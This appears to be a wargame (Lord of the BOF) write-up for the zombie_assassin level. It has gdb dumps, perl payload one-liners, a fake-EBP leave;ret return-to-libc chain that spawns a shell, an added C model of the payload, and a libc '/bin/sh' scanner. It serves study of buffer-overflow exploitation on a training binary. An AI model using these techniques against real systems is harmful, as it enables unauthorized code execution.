0xbffffb40:     0x00000203      0x00000203      0x00000203      0x00000006

0xbffffb50:     0x08048034      0x08048390      0xbffff87c      0x40002179

0xbffffb60:     0x00006120      0x4000220c      0x08048390      0x00000000

0xbffffb70:     0x00000000      0x40020e90      0x00000612      0x40021fd0

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "AAAA"'`

AAAA@BBBBù¿@(ü ¿AAAA

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@(ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/60wx $esp-60

0xbffffaa4:     0x080484dc      0x0804857e      0xbffffab0      0x41414141

0xbffffab4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad4:     0x90909090      0xbffffc28      0x41414141      0x00000002

0xbffffae4:     0xbffffb24      0xbffffb30      0x40013868      0x00000002

0xbffffaf4:     0x08048390      0x00000000      0x080483b1      0x08048440

0xbffffb04:     0x00000002      0xbffffb24      0x080482e4      0x0804851c

0xbffffb14:     0x4000ae60      0xbffffb1c      0x40013e90      0x00000002

0xbffffb24:     0xbffffc16      0xbffffc28      0x00000000      0xbffffc59

0xbffffb34:     0xbffffc6c      0xbffffc84      0xbffffca3      0xbffffcc5

0xbffffb44:     0xbffffcd3      0xbffffe96      0xbffffeb5      0xbffffed3

0xbffffb54:     0xbffffee8      0xbfffff08      0xbfffff13      0xbfffff24

0xbffffb64:     0xbfffff2c      0xbfffff36      0xbfffff46      0xbfffff54

0xbffffb74:     0xbfffff62      0xbfffff73      0xbfffff7e      0xbfffff92

0xbffffb84:     0xbfffffd6      0x00000000      0x00000003      0x08048034

(gdb) x/wx 0xbffffaaf

0xbffffaaf:     0x414141bf

(gdb) x/wx 0xbffffaae

0xbffffaae:     0x4141bfff

(gdb) x/wx 0xbffffab1

0xbffffab1:     0xe0414141

(gdb) x/wx 0xbffffab0

0xbffffab0:     0x41414141

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ q

sh: q: command not found

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516
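How the pieces in the log fit together, and then an added example (my own code, not part of the original post). From the disassembly, main's buffer sits at ebp-0x28 (40 bytes) and strncpy copies exactly 48 bytes of argv[1], so the copy fills the buffer, the saved ebp and the return address and nothing else, while argv[1][47], the top byte of the new return address, may be neither 0xbf (stack) nor 0x40 (libc). The way around that filter is the leave;ret at main+159 (0x080484df, top byte 0x08): main's own leave;ret pops the fake ebp and returns to the gadget; the gadget's leave moves esp onto the fake frame, its pop takes the first dword (AAAA) into ebp and its ret jumps to the second dword, system(). system() then sees BBBB as its return address and the fourth dword, the address of "/bin/sh" inside libc, as its argument. For this to work the fake ebp has to be the address of the buffer itself: under ltrace the strncpy destination is 0xbffffab0, and the core from the "AAAA" test run shows the same bytes at 0xbffffab0 with the saved-ebp slot at 0xbffffad8. The earlier attempts pointed the fake ebp at the copy of argv[1] in the argument area (0xbffffc28, 0xbffffc2a, 0xbffffc2d, ...): two bytes short of that copy the ret pops "AA\xe0\x8a" and crashes at 0x8ae04141 (the first ltrace run), four bytes short it crashes at 0x41414141, and an exact hit does reach system() (strace shows vfork and a wait4 status of 127, and the core's command line shows that copy clobbered) but no shell appears and execution falls through to 0x42424242, BBBB. Two smaller things the log shows: inside gdb the 0xff byte of the fake ebp never reached the process (the echoed buffer stops after "(ü" and the return-address slot at main+160 reads 0), so 0xaa was substituted to check the layout and the real value was used outside gdb; and since a full 48-byte strncpy leaves no terminator, printf runs past the buffer (write() reports 50 bytes), which is harmless here.

The block below models that chain in C using the addresses recorded in the log (they were stable across the runs in the same environment). It builds the 48-byte argv[1], applies the binary's own byte-47 filter, and then executes the two leave;ret sequences over a small memory model to report where eip lands and what the callee would see at [esp] and [esp+4]. The model covers only the 48-byte copy at 0xbffffab0 plus 8 bytes below it that are assumed to be zero; anything outside is reported as a fault. It goes slightly beyond the post by letting you try any fake-ebp offset, which is how the off-by-two and off-by-four crash addresses above fall out.

```c
/* Added example, not from the original post: a model of the fake-EBP chain
 * against zombie_assassin, using the addresses recorded in the log above.
 * Only the 48-byte copy at the buffer plus 8 assumed zero bytes below it are
 * modelled; everything else on the stack is ignored. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SYSTEM_ADDR  0x40058ae0u  /* system() in libc (from the log)            */
#define BINSH_ADDR   0x400fbff9u  /* "/bin/sh" inside libc, found with foo.c    */
#define LEAVE_RET    0x080484dfu  /* main+159: leave ; ret                      */
#define BUFFER_ADDR  0xbffffab0u  /* strncpy destination from ltrace / the core */
#define PAYLOAD_LEN  48           /* strncpy(buffer, argv[1], 48)               */

static void put32(uint8_t *p, uint32_t v)        /* little-endian store */
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

static uint32_t get32(const uint8_t *p)          /* little-endian load */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* argv[1] = [AAAA][&system][BBBB][&"/bin/sh"][nop x24][fake ebp][ret]
 * Returns -1 if the binary's own check on argv[1][47] would reject it
 * (top byte of ret 0xbf -> "stack retbayed you", 0x40 -> "library retbayed you"). */
int build_payload(uint8_t out[PAYLOAD_LEN], uint32_t fake_ebp, uint32_t ret)
{
    memset(out, 'A', 4);              /* popped into ebp by the gadget's leave  */
    put32(out + 4, SYSTEM_ADDR);      /* popped into eip by the gadget's ret    */
    memset(out + 8, 'B', 4);          /* system()'s return address (never used) */
    put32(out + 12, BINSH_ADDR);      /* system()'s argument                    */
    memset(out + 16, 0x90, 24);       /* filler up to main's saved ebp          */
    put32(out + 40, fake_ebp);        /* overwrites main's saved ebp            */
    put32(out + 44, ret);             /* overwrites main's return address       */
    return (out[47] == 0xbf || out[47] == 0x40) ? -1 : 0;
}

struct cpu { uint32_t esp, ebp, eip; };

struct stack_model {
    uint32_t base;      /* address represented by mem[0] */
    uint8_t  mem[64];   /* 8 assumed-zero bytes, the 48-byte copy, 8 bytes above */
};

/* Read a dword from the model; an access outside it is what a real CPU would
 * turn into SIGSEGV, so it is flagged and reads as 0. */
static uint32_t rd32(const struct stack_model *m, uint32_t addr, int *fault)
{
    if (addr < m->base || addr - m->base + 4 > sizeof m->mem) { *fault = 1; return 0; }
    return get32(m->mem + (addr - m->base));
}

/* One "leave ; ret": mov esp,ebp ; pop ebp ; ret */
static void leave_ret(const struct stack_model *m, struct cpu *c, int *fault)
{
    c->esp = c->ebp;
    c->ebp = rd32(m, c->esp, fault); c->esp += 4;
    c->eip = rd32(m, c->esp, fault); c->esp += 4;
}

struct landing { uint32_t eip, ret_slot, arg; int fault; };

/* Place the payload at BUFFER_ADDR, run main's epilogue and, if it lands on
 * the gadget, the gadget's epilogue too; report where eip ends up and what the
 * callee would see as its return address and first argument. */
struct landing run_chain(uint32_t fake_ebp)
{
    struct stack_model m = { .base = BUFFER_ADDR - 8 };  /* mem[] zeroed by the initializer */
    struct cpu c = { .esp = 0, .ebp = BUFFER_ADDR + 40, .eip = 0 }; /* buffer = ebp - 0x28 */
    struct landing l = { 0, 0, 0, 0 };
    uint8_t payload[PAYLOAD_LEN];

    if (build_payload(payload, fake_ebp, LEAVE_RET) != 0) { l.fault = 1; return l; }
    memcpy(m.mem + 8, payload, PAYLOAD_LEN);   /* strncpy(buffer, argv[1], 48) */

    leave_ret(&m, &c, &l.fault);               /* main+159/160: leave ; ret          */
    if (!l.fault && c.eip == LEAVE_RET)        /* ... which returned onto the gadget */
        leave_ret(&m, &c, &l.fault);           /* now with esp = fake ebp            */
    l.eip      = c.eip;
    l.ret_slot = rd32(&m, c.esp, &l.fault);     /* [esp]   : callee's return address */
    l.arg      = rd32(&m, c.esp + 4, &l.fault); /* [esp+4] : callee's first argument */
    return l;
}

int main(void)
{
    uint8_t payload[PAYLOAD_LEN];
    const uint32_t candidates[] = { BUFFER_ADDR, BUFFER_ADDR - 2, BUFFER_ADDR - 4 };

    build_payload(payload, BUFFER_ADDR, LEAVE_RET);
    printf("argv[1] = ");
    for (int i = 0; i < PAYLOAD_LEN; i++) printf("\\x%02x", payload[i]);
    printf("\n");

    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++) {
        struct landing l = run_chain(candidates[i]);
        printf("fake ebp 0x%08x -> eip 0x%08x, [esp] 0x%08x, [esp+4] 0x%08x%s\n",
               candidates[i], l.eip, l.ret_slot, l.arg, l.fault ? " (fault)" : "");
    }
    return 0;
}
```

With the fake ebp equal to the buffer address the model lands on system() with [esp] = BBBB and [esp+4] = the "/bin/sh" pointer; two bytes low it lands on 0x8ae04141 and four bytes low on 0x41414141, the same values the ltrace run and the "\x24" core reported, because the argument-area copy the early attempts pointed at holds the same 48 bytes. Feeding a return address in the stack or libc range to build_payload makes it return -1, which is the filter the leave;ret gadget is there to dodge.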



*) I located the "/bin/sh" string inside libc and used that; the source for finding it came from here.

<http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>


- The source -


[assassin@localhost assassin]$ cat foo.c

#include <stdio.h>
#include <string.h>

/* Scan the mapped libc image for the string "/bin/sh" and print its address.
 * 0x4002c000 lies inside libc on this box (strace above shows libc mapped at
 * 0x40018000); the loop walks upward until it finds the string or runs off
 * the mapping and segfaults, so there is nothing to free or close. */
int main(void)
{
        char *p;

        p = (char *)0x4002c000;

        while (1) {
                while (*p++ != '/') ;
                if (strcmp(p-1, "/bin/sh") == 0) {
                        printf("0x%08x\n", (unsigned int)(p-1));
                        return 0;
                }
        }
}



Other posts in the 'STUDY > Lord of the BOF' category

zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
giant->assassin  (0) 2014.04.22
bugbear->giant(1)  (0) 2014.04.16
darkknight->bugbear  (2) 2014.04.07
